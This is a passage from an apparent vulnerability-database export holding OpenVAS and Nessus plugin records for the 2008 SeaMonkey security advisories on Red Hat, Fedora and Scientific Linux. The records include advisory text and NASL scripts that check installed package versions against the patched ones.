rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-debuginfo\", rpm:\"seamonkey-debuginfo~1.0.9~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-debuginfo\", rpm:\"seamonkey-debuginfo~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:32", "references": ["https://www.redhat.com/archives/rhsa-announce/2008-September/msg00012.html", "2008:0882-01"], "pluginID": "870142", "description": "Check for the Version of seamonkey", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-03-06T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "title": "RedHat Update for seamonkey RHSA-2008:0882-01", "type": "openvas", "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2017-07-12T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=870142", "id": "OPENVAS:870142", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for seamonkey RHSA-2008:0882-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SeaMonkey is an open source Web browser, advanced email and newsgroup\n client, IRC chat client, and HTML editor.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code as the user running SeaMonkey.\n (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,\n CVE-2008-4062)\n \n Several flaws were found in the way malformed web content was displayed. A\n web page containing specially crafted content could potentially trick a\n SeaMonkey user into surrendering sensitive information. (CVE-2008-3835,\n CVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n \n A flaw was found in the way SeaMonkey handles mouse click events. A web page\n containing specially crafted JavaScript code could move the content window\n while a mouse-button was pressed, causing any item under the pointer to be\n dragged. This could, potentially, cause the user to perform an unsafe\n drag-and-drop action. (CVE-2008-3837)\n \n A flaw was found in SeaMonkey that caused certain characters to be stripped\n from JavaScript code. This flaw could allow malicious JavaScript to bypass\n or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n \n All SeaMonkey users should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"seamonkey on Red Hat Enterprise Linux AS (Advanced Server) version 2.1,\n Red Hat Enterprise Linux ES version 2.1,\n Red Hat Enterprise Linux WS version 2.1,\n Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux WS version 3,\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-September/msg00012.html\");\n script_id(870142);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0882-01\");\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n script_name( \"RedHat Update for seamonkey RHSA-2008:0882-01\");\n\n script_summary(\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_2.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"devhelp\", rpm:\"devhelp~0.10~0.10.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"devhelp-debuginfo\", rpm:\"devhelp-debuginfo~0.10~0.10.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"devhelp-devel\", rpm:\"devhelp-devel~0.10~0.10.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-debuginfo\", rpm:\"seamonkey-debuginfo~1.0.9~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_3\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-debuginfo\", rpm:\"seamonkey-debuginfo~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.24.el3\", rls:\"RHENT_3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:47", "references": ["2008-8401", "https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01384.html"], "pluginID": "860002", "description": "Check for the Version of seamonkey", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-02-17T00:00:00", "title": "Fedora Update for seamonkey FEDORA-2008-8401", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=860002", "id": "OPENVAS:860002", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for seamonkey FEDORA-2008-8401\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"seamonkey on Fedora 8\";\ntag_insight = \"SeaMonkey is an all-in-one Internet application suite. It includes\n a browser, mail/news client, IRC client, JavaScript debugger, and\n a tool to inspect the DOM for web pages. It is derived from the\n application formerly known as Mozilla Application Suite.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01384.html\");\n script_id(860002);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:05:11 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-8401\");\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-3835\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\", \"CVE-2008-3837\", \"CVE-2008-4065\", \"CVE-2008-4066\");\n script_name( \"Fedora Update for seamonkey FEDORA-2008-8401\");\n\n script_summary(\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC8\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.1.12~1.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:42:51", "references": ["http://www.nessus.org/u?d5b3c3db"], "pluginID": "60476", "description": "Several flaws were found in the processing of malformed web content. A web page containing malicious content could cause SeaMonkey to crash or, potentially, execute arbitrary code as the user running SeaMonkey.\n(CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed web content was displayed. A web page containing specially crafted content could potentially trick a SeaMonkey user into surrendering sensitive information. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n\nA flaw was found in the way SeaMonkey handles mouse click events. A web page containing specially crafted JavaScript code could move the content window while a mouse-button was pressed, causing any item under the pointer to be dragged. This could, potentially, cause the user to perform an unsafe drag-and-drop action. (CVE-2008-3837)\n\nA flaw was found in SeaMonkey that caused certain characters to be stripped from JavaScript code. This flaw could allow malicious JavaScript to bypass or evade script filters. (CVE-2008-4065, CVE-2008-4066)", "edition": 5, "reporter": "Tenable", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : seamonkey on SL3.x, SL4.x i386/x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2016-12-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20080923_SEAMONKEY_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60476", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60476);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2016/12/14 20:22:13 $\");\n\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n\n script_name(english:\"Scientific Linux Security Update : seamonkey on SL3.x, SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause SeaMonkey to crash\nor, potentially, execute arbitrary code as the user running SeaMonkey.\n(CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060,\nCVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed web content was\ndisplayed. A web page containing specially crafted content could\npotentially trick a SeaMonkey user into surrendering sensitive\ninformation. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068,\nCVE-2008-4069)\n\nA flaw was found in the way SeaMonkey handles mouse click events. A\nweb page containing specially crafted JavaScript code could move the\ncontent window while a mouse-button was pressed, causing any item\nunder the pointer to be dragged. This could, potentially, cause the\nuser to perform an unsafe drag-and-drop action. (CVE-2008-3837)\n\nA flaw was found in SeaMonkey that caused certain characters to be\nstripped from JavaScript code. This flaw could allow malicious\nJavaScript to bypass or evade script filters. (CVE-2008-4065,\nCVE-2008-4066)\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind0809&L=scientific-linux-errata&T=0&P=922\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d5b3c3db\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 189, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-1.0.9-0.24.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-chat-1.0.9-0.24.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-devel-1.0.9-0.24.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-dom-inspector-1.0.9-0.24.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-js-debugger-1.0.9-0.24.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-mail-1.0.9-0.24.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-nspr-1.0.9-0.24.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-nspr-devel-1.0.9-0.24.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-nss-1.0.9-0.24.el3\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"seamonkey-nss-devel-1.0.9-0.24.el3\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"devhelp-0.10-0.10.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"devhelp-devel-0.10-0.10.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-1.0.9-26.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-chat-1.0.9-26.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-devel-1.0.9-26.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-dom-inspector-1.0.9-26.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-js-debugger-1.0.9-26.el4\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"seamonkey-mail-1.0.9-26.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:42:02", "references": ["https://oss.oracle.com/pipermail/el-errata/2008-September/000740.html", "https://oss.oracle.com/pipermail/el-errata/2008-September/000739.html"], "pluginID": "67745", "description": "From Red Hat Security Advisory 2008:0882 :\n\nUpdated SeaMonkey packages that fix a security issues are now available for Red Hat Enterprise Linux 2.1, Red Hat Enterprise Linux 3 and Red Hat Enterprise Linux 4.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup client, IRC chat client, and HTML editor.\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause SeaMonkey to crash or, potentially, execute arbitrary code as the user running SeaMonkey.\n(CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed web content was displayed. A web page containing specially crafted content could potentially trick a SeaMonkey user into surrendering sensitive information. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n\nA flaw was found in the way SeaMonkey handles mouse click events. A web page containing specially crafted JavaScript code could move the content window while a mouse-button was pressed, causing any item under the pointer to be dragged. This could, potentially, cause the user to perform an 